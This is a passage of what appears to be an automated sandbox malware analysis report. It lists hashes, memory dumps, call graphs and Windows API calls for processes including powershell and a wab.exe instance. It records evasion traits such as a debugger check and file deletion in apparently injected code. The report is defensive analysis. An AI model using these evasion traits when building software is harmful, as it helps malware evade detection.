                                                                        • Instruction Fuzzy Hash: DDF08235B05244CFC701CBA8DD909AEFB76EFC9204B14C49BC44597362C635AC06CBA1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 07DD2D8D Relevance: .0, Instructions: 23COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.2598404025.0000000007DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DD0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_7dd0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 82ef4519500001b8d1cb82d5509916d0e18cb5b6207a9b36df4e65e9c1442ef5
                                                                        • Instruction ID: 761d0e0d6e50ddc3f5a81bc40b3b413aea245fd87ef7f418ba5ed6f671e1ab02
                                                                        • Opcode Fuzzy Hash: 82ef4519500001b8d1cb82d5509916d0e18cb5b6207a9b36df4e65e9c1442ef5
                                                                        • Instruction Fuzzy Hash: 47E0ED71609742CFD3168A14CD64A10FBB2BF8A315F1DC0DA91498F1D6D736ED46CB91
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Non-executed Functions

                                                                        Function 04DCDAAC Relevance: .1, Instructions: 69COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.2587204651.0000000004DCD000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DCD000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_4dcd000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 1643b9242ca39005eae2149683d5a08ca9576a3bb198eb652ab1faae5bf3bcc3
                                                                        • Instruction ID: ed8975d41a73b89207147e5dac7241a79e9d2100c279658b3f63800954ad13e5
                                                                        • Opcode Fuzzy Hash: 1643b9242ca39005eae2149683d5a08ca9576a3bb198eb652ab1faae5bf3bcc3
                                                                        • Instruction Fuzzy Hash: C12102B2604241AFDB04DF14D9C0B2AFBA7FBD4724F20857DD94A4B241C77AE406CA62
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Execution Graph

                                                                        Execution Coverage:6.9%
                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                        Signature Coverage:50%
                                                                        Total number of Nodes:6
                                                                        Total number of Limit Nodes:0
                                                                        execution_graph 16027 a5ad70 16028 a5adb6 DeleteFileW 16027->16028 16030 a5adef 16028->16030 16031 a570b8 16032 a570fc CheckRemoteDebuggerPresent 16031->16032 16033 a5713e 16032->16033

                                                                        Executed Functions

                                                                        Function 00A570B8 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 225 a570b8-a5713c CheckRemoteDebuggerPresent 227 a57145-a57180 225->227 228 a5713e-a57144 225->228 228->227
                                                                        APIs
                                                                        • CheckRemoteDebuggerPresent.KERNEL32(?,?), ref: 00A5712F
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.3346172513.0000000000A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_a50000_wab.jbxd
                                                                        Similarity
                                                                        • API ID: CheckDebuggerPresentRemote
                                                                        • String ID:
                                                                        • API String ID: 3662101638-0
                                                                        • Opcode ID: 93e8b1c2d8897745a6d0d2bff0dae281fdc03d97668eeb58b14d95e77da4a20f
                                                                        • Instruction ID: 442f2aab88f0b24e51e1ee69d954b3cc09d7be76f6691746b8e75552308efe13
                                                                        • Opcode Fuzzy Hash: 93e8b1c2d8897745a6d0d2bff0dae281fdc03d97668eeb58b14d95e77da4a20f
                                                                        • Instruction Fuzzy Hash: 9A2128B19006598FDB10CFAAD884BEEBBF4BF49320F14845AE859B7250D778A944CF61
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00A570B0 Relevance: 1.6, APIs: 1, Instructions: 68COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 219 a570b0-a5713c CheckRemoteDebuggerPresent 221 a57145-a57180 219->221 222 a5713e-a57144 219->222 222->221
                                                                        APIs
                                                                        • CheckRemoteDebuggerPresent.KERNEL32(?,?), ref: 00A5712F
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.3346172513.0000000000A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_a50000_wab.jbxd
                                                                        Similarity
                                                                        • API ID: CheckDebuggerPresentRemote
                                                                        • String ID:
                                                                        • API String ID: 3662101638-0
                                                                        • Opcode ID: 22beed14c721828e3936b5cef151b685539e4802df05ebb7e3a4d3eb712e7ad7
                                                                        • Instruction ID: 627b572b7ce03b4c3939988d70e4ea5fff1cefc3e2702ba1173408ffa65eff9b
                                                                        • Opcode Fuzzy Hash: 22beed14c721828e3936b5cef151b685539e4802df05ebb7e3a4d3eb712e7ad7
                                                                        • Instruction Fuzzy Hash: 532139B18006598FCB14CFAAD4447EEBBF4FF49320F14845AE858B7250D778A944CFA1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00A5AD69 Relevance: 1.6, APIs: 1, Instructions: 57fileCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 231 a5ad69-a5adba 233 a5adc2-a5aded DeleteFileW 231->233 234 a5adbc-a5adbf 231->234 235 a5adf6-a5ae1e 233->235 236 a5adef-a5adf5 233->236 234->233 236->235
                                                                        APIs
                                                                        • DeleteFileW.KERNEL32(00000000), ref: 00A5ADE0
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.3346172513.0000000000A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_a50000_wab.jbxd
                                                                        Similarity
                                                                        • API ID: DeleteFile
                                                                        • String ID:
                                                                        • API String ID: 4033686569-0
                                                                        • Opcode ID: 46c695df02c32c3c337b2764eb328f61f072deecf3824d6cc6248055b3b30917
                                                                        • Instruction ID: 3191ce20bf6f848c3a12edada43abf7af503f365fcf33ed682bff4a44e155ae2
                                                                        • Opcode Fuzzy Hash: 46c695df02c32c3c337b2764eb328f61f072deecf3824d6cc6248055b3b30917
                                                                        • Instruction Fuzzy Hash: ED2124B6D0065A9FCB10DF9AC5447DEFBB0BF48721F10862AD818B7640D778A944CFA1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00A5AD70 Relevance: 1.6, APIs: 1, Instructions: 56fileCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 239 a5ad70-a5adba 241 a5adc2-a5aded DeleteFileW 239->241 242 a5adbc-a5adbf 239->242 243 a5adf6-a5ae1e 241->243 244 a5adef-a5adf5 241->244 242->241 244->243
                                                                        APIs
                                                                        • DeleteFileW.KERNEL32(00000000), ref: 00A5ADE0
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.3346172513.0000000000A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_a50000_wab.jbxd
                                                                        Similarity
                                                                        • API ID: DeleteFile
                                                                        • String ID:
                                                                        • API String ID: 4033686569-0
                                                                        • Opcode ID: b933feb988e960ae1ce4385ed0c311f5bffda82e5c3e376b929a5c649c61a639
                                                                        • Instruction ID: 08a7e875e214929704bcf79002ab0c9973f8bb34c480b51f4ed816f54c995862
                                                                        • Opcode Fuzzy Hash: b933feb988e960ae1ce4385ed0c311f5bffda82e5c3e376b929a5c649c61a639
                                                                        • Instruction Fuzzy Hash: BA1124B2D0065A9BCB10DF9AC54479EFBB4BF48720F10862AD918A7640D778A944CFA1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00A2D030 Relevance: .1, Instructions: 72COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.3345790120.0000000000A2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A2D000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_a2d000_wab.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: ca5891e6e6fe84d837179383d4922208fd85fdf45c24fae030f06df2a2f0b0a1
                                                                        • Instruction ID: 2e4f012e1dc913b0cf32699dec0fee438e553852ca55b6c5ed63ada723b407b2
                                                                        • Opcode Fuzzy Hash: ca5891e6e6fe84d837179383d4922208fd85fdf45c24fae030f06df2a2f0b0a1
                                                                        • Instruction Fuzzy Hash: 0C212571508204EFCB14DF18E9C0B26BB61FB84314F20C57DD90A4B267C776D846CA62
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00A2D02B Relevance: .1, Instructions: 53COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.3345790120.0000000000A2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A2D000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_a2d000_wab.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 50f7e29a630608d0546145974b4e8461a6f7dcc6741a455d6d64f55d25f6ac08
                                                                        • Instruction ID: 41a0e56d087f2ca597104f26e180aef8f9d12162441148260ad6f81eee6136f7
                                                                        • Opcode Fuzzy Hash: 50f7e29a630608d0546145974b4e8461a6f7dcc6741a455d6d64f55d25f6ac08
                                                                        • Instruction Fuzzy Hash: CA119D75508284DFCB15CF14E5C4B15FBA1FB84318F28C6AAD84A4B667C33AD85ACB62
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Execution Graph

                                                                        Execution Coverage:27.7%
                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                        Signature Coverage:28.4%
                                                                        Total number of Nodes:211
                                                                        Total number of Limit Nodes:4
                                                                        execution_graph 870 3831bf _XcptFilter 648 383030 665 383675 648->665 650 383035 651 383046 GetStartupInfoW 650->651 652 383063 651->652 653 383078 652->653 654 38307f Sleep 652->654 655 383097 _amsg_exit 653->655 657 3830a1 653->657 654->652 655->657 656 3830e3 _initterm 661 3830fe __IsNonwritableInCurrentImage 656->661 657->656 658 3830c4 657->658 657->661 659 3831a6 _ismbblead 659->661 661->659 662 3831ee 661->662 663 38318e exit 661->663 670 381c5c 661->670 662->658 664 3831f7 _cexit 662->664 663->661 664->658 666 38369a 665->666 667 38369e GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 665->667 666->667 668 383702 666->668 669 3836ed 667->669 668->650 669->668 728 3837f0 670->728 674 381d01 HeapSetInformation 675 381d20 674->675 683 381d18 674->683 732 3829ab CommandLineToArgvW 675->732 680 381e0e 746 381b83 memset 680->746 782 381ae4 683->782 684 381e2f 752 3825d3 memset memset CommandLineToArgvW 684->752 685 381e22 GetLastError 685->683 690 381ae4 2 API calls 691 38259a 690->691 786 3832b0 691->786 694 3825a9 694->661 695 381eee 696 381ef2 EventUnregister 695->696 697 381f6d 696->697 698 381f1f memset LoadStringW MessageBoxW 696->698 700 381f79 GetProcAddress 697->700 704 38202e 697->704 698->683 700->683 701 382036 GetProcAddress 701->683 721 38204e 701->721 704->701 705 38208a 704->705 705->683 706 38211c GetProcAddress 705->706 706->683 707 382136 706->707 708 38218c memset 707->708 710 382225 707->710 712 3821a9 LoadStringW 708->712 711 382384 710->711 792 381b21 710->792 713 38242a 711->713 714 38238d GetProcAddress 711->714 712->710 716 3824d0 713->716 717 382433 GetProcAddress 713->717 714->683 722 3823a5 714->722 718 3824d8 GetProcAddress 716->718 719 3824f0 716->719 717->683 723 38244b 717->723 718->683 718->719 719->683 720 382525 GetProcAddress 719->720 720->683 720->721 721->683 722->683 724 3823e2 memset LoadStringW 722->724 723->683 726 382488 memset LoadStringW 723->726 724->713 726->716 727 38233c memset LoadStringW 727->711 729 381c6b memset GetCommandLineW 728->729 730 381ab0 729->730 731 381acb 730->731 731->674 731->731 733 3829cc 732->733 734 381d27 732->734 735 3829db LocalFree 733->735 738 381bf4 734->738 735->734 737 3829ec 735->737 736 382a08 RegisterApplicationRestart 736->734 737->736 796 3828a4 memset 738->796 741 381c28 PathAppendW 742 381c4d 741->742 744 381c3e LoadLibraryW 741->744 743 3832b0 4 API calls 742->743 745 381c5a 6 API calls 743->745 744->742 745->680 745->683 747 3828a4 10 API calls 746->747 748 381bbb LoadLibraryW 747->748 750 3832b0 4 API calls 748->750 751 381bf2 750->751 751->684 751->685 753 382888 752->753 754 382661 752->754 755 3832b0 4 API calls 753->755 756 38287d LocalFree 754->756 757 382683 StrCmpNIW 754->757 764 382676 754->764 758 381e43 755->758 756->753 759 3826f0 757->759 761 3826a0 757->761 758->683 777 38193a EventRegister 758->777 762 382741 759->762 763 382709 PathFindExtensionW 759->763 760 382761 StrCmpIW 760->762 765 382785 760->765 761->764 808 381b57 761->808 762->760 762->764 766 38271e StrCmpIW 763->766 764->756 765->764 769 3827c0 765->769 766->762 767 382730 766->767 767->764 767->766 770 3827d3 GetFileAttributesW 769->770 771 3827e5 770->771 775 382833 770->775 772 3827ee PathRemoveFileSpecW 771->772 773 382811 771->773 772->773 774 3827ff GetFileAttributesW 772->774 773->764 774->773 774->775 775->773 812 382b60 775->812 778 381998 EventSetInformation 777->778 779 38198b 777->779 778->779 780 3832b0 4 API calls 779->780 781 3819c5 780->781 781->695 781->696 791 3819c7 EventWriteTransfer 781->791 783 381af2 782->783 784 381b16 783->784 785 381b06 GetProcessHeap HeapFree 783->785 784->690 785->784 787 3832b8 786->787 788 3832bb 786->788 787->694 826 3832c0 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 788->826 790 3833f6 790->694 791->695 793 381b2e 792->793 794 381b4d 792->794 827 382c36 793->827 794->683 794->727 797 38299d 796->797 798 3828ee RegOpenKeyExW 796->798 799 3832b0 4 API calls 797->799 800 382989 798->800 801 382914 RegQueryValueExW 798->801 803 381c17 PathRemoveFileSpecW 799->803 800->797 802 382991 RegCloseKey 800->802 801->800 804 382949 801->804 802->797 803->741 803->742 805 382958 ExpandEnvironmentStringsW 804->805 806 38296d GetFileAttributesW 804->806 805->800 806->800 807 382979 806->807 807->800 809 381b63 808->809 810 382b60 6 API calls 809->810 811 381b7b 810->811 811->764 813 382bc7 812->813 814 382b74 812->814 813->773 814->813 818 382a7e 814->818 817 382baa memcpy 817->813 819 382a95 818->819 820 382a8e 818->820 819->820 821 382ac9 GetProcessHeap HeapAlloc 819->821 820->813 820->817 821->820 822 382adf 821->822 823 382ae5 memcpy 822->823 824 382aff 822->824 823->824 824->820 824->824 825 382b33 GetProcessHeap HeapFree 824->825 825->820 826->790 828 382ce8 827->828 829 382c61 827->829 830 3832b0 4 API calls 828->830 832 382a7e 5 API calls 829->832 831 382cf7 830->831 831->794 833 382c86 832->833 838 382cd4 833->838 839 382cfb 833->839 834 381ae4 2 API calls 834->828 838->834 840 382cae 839->840 841 382d0a 839->841 840->838 847 382bd5 840->847 841->840 853 382ef8 841->853 844 382d44 memset 844->840 846 382d4b memset 846->840 848 382c28 847->848 849 382be5 847->849 848->838 849->848 850 382a7e 5 API calls 849->850 851 382c0b 850->851 851->848 852 382c11 memcpy 851->852 852->848 854 382f07 853->854 856 382d2b 854->856 857 382e3f 854->857 856->844 856->846 858 382e83 857->858 859 382e8f 858->859 860 382e9f LocalAlloc 858->860 859->856 860->859 861 382eaf 860->861 862 382ee8 LocalFree 861->862 865 382deb 861->865 862->859 864 382eda 864->862 866 382df8 865->866 868 382e1c 865->868 867 382e06 IsDBCSLeadByte 866->867 866->868 867->866 867->868 868->864 871 3825b0 872 3825be DefWindowProcW 871->872 873 3825c5 PostQuitMessage 871->873 872->873 874 383790 _except_handler4_common 875 383450 SetUnhandledExceptionFilter 881 383400 882 38343d 881->882 883 383412 881->883 883->882 884 383437 ?terminate@ 883->884 884->882 885 382f80 886 382f85 885->886 894 3834d8 GetModuleHandleW 886->894 888 382f91 __set_app_type __p__fmode __p__commode 889 382fc9 888->889 890 382fde 889->890 891 382fd2 __setusermatherr 889->891 896 38370d _controlfp 890->896 891->890 893 382fe3 895 3834e9 894->895 895->888 896->893 869 383001 __getmainargs 897 3837c2 898 3837d3 897->898 901 382f51 ResolveDelayLoadedAPI 898->901 900 3837e0 901->900 876 3831d3 877 3831ee 876->877 878 3831e7 _exit 876->878 879 3831f7 _cexit 877->879 880 383202 877->880 878->877 879->880

                                                                        Callgraph

                                                                        • Executed
                                                                        • Not Executed
                                                                        • Opacity -> Relevance
                                                                        • Disassembly available
                                                                        callgraph 0 Function_0038193A 6 Function_003832B0 0->6 1 Function_003831BF 2 Function_00382E3F 33 Function_00382D7F 2->33 37 Function_00382DEB 2->37 3 Function_003825B0 4 Function_003818B0 5 Function_00383530 53 Function_003832C0 6->53 7 Function_00381AB0 8 Function_00383030 12 Function_00383728 8->12 18 Function_00383219 8->18 23 Function_00383580 8->23 36 Function_00383675 8->36 44 Function_00381C5C 8->44 9 Function_003834B1 10 Function_003834B5 11 Function_00382C36 11->6 11->7 31 Function_00382CFB 11->31 32 Function_00382A7E 11->32 41 Function_00381AE4 11->41 49 Function_00382BD5 11->49 13 Function_003829AB 15 Function_00382A21 13->15 14 Function_00383520 16 Function_00381B21 16->11 17 Function_003828A4 17->6 40 Function_00381A60 17->40 19 Function_0038361E 20 Function_00383790 21 Function_0038360B 22 Function_0038370D 23->5 52 Function_00383640 23->52 24 Function_00383400 25 Function_00381B80 26 Function_00382F80 26->14 26->22 43 Function_003834D8 26->43 51 Function_0038324A 26->51 27 Function_00383001 28 Function_00381B83 28->6 28->17 29 Function_00382EF8 29->2 30 Function_003813F8 31->29 34 Function_003837F0 35 Function_00381BF4 35->6 35->17 38 Function_0038376D 39 Function_00382B60 39->32 42 Function_00383464 42->12 43->42 44->0 44->6 44->7 44->13 44->16 44->28 44->34 44->35 44->41 47 Function_003825D3 44->47 55 Function_003819C7 44->55 45 Function_00383450 46 Function_00382F51 47->6 47->39 47->40 50 Function_00381B57 47->50 48 Function_003831D3 49->32 50->39 54 Function_003837C2 54->46

                                                                        Executed Functions

                                                                        Function 00381C5C Relevance: 63.6, APIs: 31, Strings: 5, Instructions: 637registrymemorywindowCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 0 381c5c-381d16 call 3837f0 memset GetCommandLineW call 381ab0 HeapSetInformation 5 381d18-381d1b 0->5 6 381d20-381e08 call 3829ab call 381bf4 LoadStringW LoadIconW LoadCursorW GetStockObject RegisterClassW CreateWindowExW 0->6 7 381faf 5->7 6->7 20 381e0e-381e20 call 381b83 6->20 10 381fb1-381fb9 7->10 12 381fbb-381fd5 10->12 13 381fde-381fe6 10->13 12->13 31 381fd7-381fdc 12->31 14 381fe8-382004 13->14 15 38200d-382014 13->15 14->15 38 382006-38200b 14->38 18 38201a 15->18 19 382560 15->19 28 382021-382029 18->28 21 382562-382569 19->21 29 381e2f-381e45 call 3825d3 20->29 30 381e22 GetLastError 20->30 25 382578-3825aa call 381ae4 * 2 call 3832b0 21->25 26 38256b 21->26 35 382572 26->35 28->21 29->7 41 381e4b-381e62 call 38193a 29->41 34 381e28-381e2a 30->34 31->13 34->7 35->25 38->15 47 381e68-381e76 41->47 48 381ef0 41->48 49 381ef2-381f1d EventUnregister 47->49 50 381e78-381e88 47->50 48->49 51 381f6d-381f73 49->51 52 381f1f-381f62 memset LoadStringW MessageBoxW 49->52 50->49 53 381e8a-381e8c 50->53 55 381f79-381f8b GetProcAddress 51->55 56 38202e-382034 51->56 54 381f68-381f6b 52->54 53->49 57 381e8e-381eee call 3819c7 53->57 54->10 60 381fac-381fae 55->60 61 381f8d-381f95 55->61 58 38206a-382070 56->58 59 382036 56->59 57->49 64 382072-382074 58->64 65 382076-38207c 58->65 63 382038-382048 GetProcAddress 59->63 60->7 76 381f99-381f9b 61->76 63->60 67 38204e-38205c 63->67 64->63 69 38207e-382080 65->69 70 382082-382084 65->70 89 38205e-382063 67->89 90 382065 67->90 69->63 71 38208a-382098 70->71 72 382086-382088 70->72 73 38209a-3820a1 71->73 74 3820b3-3820b9 71->74 72->63 77 3820ab-3820b1 73->77 78 3820a3-3820a9 73->78 79 3820bb-3820c2 74->79 80 3820d4-3820da 74->80 81 381f9d-381fa2 76->81 82 381fa4-381fa6 76->82 83 38210f-382116 77->83 78->83 84 3820cc-3820d2 79->84 85 3820c4-3820ca 79->85 87 3820dc-3820e3 80->87 88 3820f5-3820fd 80->88 81->82 82->34 82->60 83->54 94 38211c-382130 GetProcAddress 83->94 84->83 85->83 91 3820ed-3820f3 87->91 92 3820e5-3820eb 87->92 88->83 93 3820ff-382109 88->93 89->90 90->60 91->83 92->83 93->83 94->54 95 382136-382179 94->95 98 38217b-382180 95->98 99 382182-382186 95->99 98->99 100 38218c-3821a7 memset 99->100 101 382225-382228 99->101 104 3821a9-3821af 100->104 105 3821ec 100->105 102 38222a-382247 101->102 103 382251-382254 101->103 123 38224a 102->123 109 382281-382284 103->109 110 382256-38227f 103->110 107 3821b1-3821b7 104->107 108 3821e5-3821ea 104->108 106 3821f1-38221a LoadStringW 105->106 106->101 114 3821b9-3821bf 107->114 115 3821de-3821e3 107->115 108->106 111 382286-382291 109->111 112 3822c7-3822ca 109->112 110->123 116 382299-3822c5 111->116 117 382293 111->117 118 3822d0-3822e4 call 381b21 112->118 119 382384-382387 112->119 120 3821c1-3821d5 114->120 121 3821d7-3821dc 114->121 115->106 116->123 117->116 118->54 136 3822ea-3822f5 118->136 124 38242a-38242d 119->124 125 38238d-38239f GetProcAddress 119->125 120->106 121->106 123->103 128 3824d0-3824d6 124->128 129 382433-382445 GetProcAddress 124->129 125->60 130 3823a5-3823c6 125->130 133 3824d8-3824ea GetProcAddress 128->133 134 382519-38251f 128->134 129->60 135 38244b-38246c 129->135 150 3823c8-3823cd 130->150 151 3823cf-3823d1 130->151 133->60 137 3824f0-382514 133->137 134->54 139 382525-382537 GetProcAddress 134->139 155 38246e-382473 135->155 156 382475-382477 135->156 141 3822fd-382320 136->141 142 3822f7 136->142 137->134 139->60 144 38253d-38255b 139->144 158 382329-38232b 141->158 159 382322-382327 141->159 142->141 144->19 150->151 151->60 152 3823d7-3823dc 151->152 152->60 157 3823e2-38241f memset LoadStringW 152->157 155->156 156->60 160 38247d-382482 156->160 157->124 158->60 162 382331-382336 158->162 159->158 160->60 163 382488-3824c5 memset LoadStringW 160->163 162->60 164 38233c-382379 memset LoadStringW 162->164 163->128 164->119
                                                                        APIs
                                                                        • memset.MSVCRT ref: 00381CC6
                                                                        • GetCommandLineW.KERNEL32 ref: 00381CCE
                                                                        • HeapSetInformation.KERNEL32(00000000,00000001,00000000,00000000,?), ref: 00381D0E
                                                                        • LoadStringW.USER32(00000000,000007D1,?,00000104), ref: 00381D49
                                                                        • LoadIconW.USER32 ref: 00381D84
                                                                        • LoadCursorW.USER32(00000000,00007F00), ref: 00381D96
                                                                        • GetStockObject.GDI32(00000000), ref: 00381DA3
                                                                        • RegisterClassW.USER32(00000003), ref: 00381DCD
                                                                        • CreateWindowExW.USER32(00000000,Contacts Viewer,?,00CF0000,00000000,00000000,0000012C,000000C8,00000000,00000000,00000000), ref: 00381DF8
                                                                        • GetLastError.KERNEL32 ref: 00381E22
                                                                        • FreeLibrary.KERNELBASE(?), ref: 0038201B
                                                                        • FreeLibrary.KERNELBASE(?), ref: 0038256C
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2713661988.0000000000381000.00000020.00000001.01000000.00000008.sdmp, Offset: 00380000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2713553787.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2713692223.0000000000385000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2713692223.0000000000387000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2713692223.000000000039D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_380000_newfile.jbxd
                                                                        Similarity
                                                                        • API ID: Load$FreeLibrary$ClassCommandCreateCursorErrorHeapIconInformationLastLineObjectRegisterStockStringWindowmemset
                                                                        • String ID: $API Entered$Contacts Viewer$WABOpen$#v
                                                                        • API String ID: 328653217-2582680833
                                                                        • Opcode ID: daf847ed8f1ca2d70e768f9ad9619f18c7b1ad52fde155288f01464ca67bd2d4
                                                                        • Instruction ID: f120a445826759c64f630387bfe56aef4e280ec46f46e96a381ec76ea9f8d9fe
                                                                        • Opcode Fuzzy Hash: daf847ed8f1ca2d70e768f9ad9619f18c7b1ad52fde155288f01464ca67bd2d4
                                                                        • Instruction Fuzzy Hash: AB32D5B59007199FDB22AB54DC88BEAB7BDFF84700F1501E9E909A72A0DB749D81CF50
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00383030 Relevance: 13.6, APIs: 9, Instructions: 144sleepCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 165 383030-383061 call 383675 call 383728 GetStartupInfoW 171 383063-383072 165->171 172 38308c-38308e 171->172 173 383074-383076 171->173 176 38308f-383095 172->176 174 383078-38307d 173->174 175 38307f-38308a Sleep 173->175 174->176 175->171 177 3830a1-3830a7 176->177 178 383097-38309f _amsg_exit 176->178 180 3830a9-3830c2 call 383219 177->180 181 3830d5 177->181 179 3830db-3830e1 178->179 183 3830fe-383100 179->183 184 3830e3-3830f4 _initterm 179->184 180->179 190 3830c4-3830d0 180->190 181->179 185 38310b-383112 183->185 186 383102-383109 183->186 184->183 188 383114-383121 call 383580 185->188 189 383137-383141 185->189 186->185 188->189 197 383123-383135 188->197 192 383144-383149 189->192 193 383209-383218 190->193 195 38314b-38314d 192->195 196 383195-383198 192->196 200 38314f-383151 195->200 201 383164-383168 195->201 198 38319a-3831a3 196->198 199 3831a6-3831b3 _ismbblead 196->199 197->189 198->199 204 3831b9-3831bd 199->204 205 3831b5-3831b6 199->205 200->196 206 383153-383155 200->206 202 38316a-38316e 201->202 203 383170-383172 201->203 207 383173-38318c call 381c5c 202->207 203->207 204->192 205->204 206->201 209 383157-38315a 206->209 213 3831ee-3831f5 207->213 214 38318e-38318f exit 207->214 209->201 210 38315c-383162 209->210 210->206 215 383202 213->215 216 3831f7-3831fd _cexit 213->216 214->196 215->193 216->215
                                                                        APIs
                                                                          • Part of subcall function 00383675: GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 003836A2
                                                                          • Part of subcall function 00383675: GetCurrentProcessId.KERNEL32 ref: 003836B1
                                                                          • Part of subcall function 00383675: GetCurrentThreadId.KERNEL32 ref: 003836BA
                                                                          • Part of subcall function 00383675: GetTickCount.KERNEL32 ref: 003836C3
                                                                          • Part of subcall function 00383675: QueryPerformanceCounter.KERNEL32(?), ref: 003836D8
                                                                        • GetStartupInfoW.KERNEL32(?,00383838,00000058), ref: 0038304F
                                                                        • Sleep.KERNEL32(000003E8), ref: 00383084
                                                                        • _amsg_exit.MSVCRT ref: 00383099
                                                                        • _initterm.MSVCRT ref: 003830ED
                                                                        • __IsNonwritableInCurrentImage.LIBCMT ref: 00383119
                                                                        • exit.KERNELBASE ref: 0038318F
                                                                        • _ismbblead.MSVCRT ref: 003831AA
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2713661988.0000000000381000.00000020.00000001.01000000.00000008.sdmp, Offset: 00380000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2713553787.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2713692223.0000000000385000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2713692223.0000000000387000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2713692223.000000000039D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_380000_newfile.jbxd
                                                                        Similarity
                                                                        • API ID: Current$Time$CountCounterFileImageInfoNonwritablePerformanceProcessQuerySleepStartupSystemThreadTick_amsg_exit_initterm_ismbbleadexit
                                                                        • String ID:
                                                                        • API String ID: 836923961-0
                                                                        • Opcode ID: 55f0c896b52608b26d3369bd16acde059e3be3fdb158ee07d3977cf93526f3e5
                                                                        • Instruction ID: bec0d82d49948eaee8e0883d0f44a35f189b97e6aa2498dc5aa9b0cd9f60e6e1
                                                                        • Opcode Fuzzy Hash: 55f0c896b52608b26d3369bd16acde059e3be3fdb158ee07d3977cf93526f3e5
